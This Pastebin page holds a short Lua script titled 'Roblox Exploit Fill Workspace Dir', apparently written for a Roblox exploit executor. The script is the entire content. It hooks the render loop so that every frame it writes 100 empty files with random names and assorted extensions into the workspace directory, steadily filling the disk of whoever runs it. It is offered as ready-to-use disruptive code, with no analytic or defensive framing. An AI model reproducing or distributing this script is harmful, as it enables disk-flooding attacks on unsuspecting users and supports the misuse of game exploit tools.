Advertisement
_Andrew27_

Roblox Exploit Fill Workspace Dir

May 23rd, 2020
1,929
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.62 KB | None | 0 0
  1. function r()
  2.     local len = math.random(10,20)
  3.     local ar = {}
  4.     for i = 1, len do
  5.         ar[i] = string.char(math.random(32, 126))
  6.     end
  7.     return tostring(table.concat(ar))
  8. end
  9.  
  10. formats={"7z","apk","bin","cab","c4","deb","dn","py","php","pdf","docx","wav","mp3","mp4","osk","vob","bat","ogg","webm","flv","avi","wmv","mov","qt","amv","3gp","mpg","bjsn","egg","egt","bkf","at3","ezip","zip","gbp","gif","jar","lua","txt","iso","tar","tib","rar","sb","lz","html","ace","esd"}
  11.  
  12. game.RunService.RenderStepped:connect(function()
  13.     for a = 1, 100 do
  14.         writefile(r() .. "." .. formats[math.random(1,#formats)],"")
  15.     end
  16. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement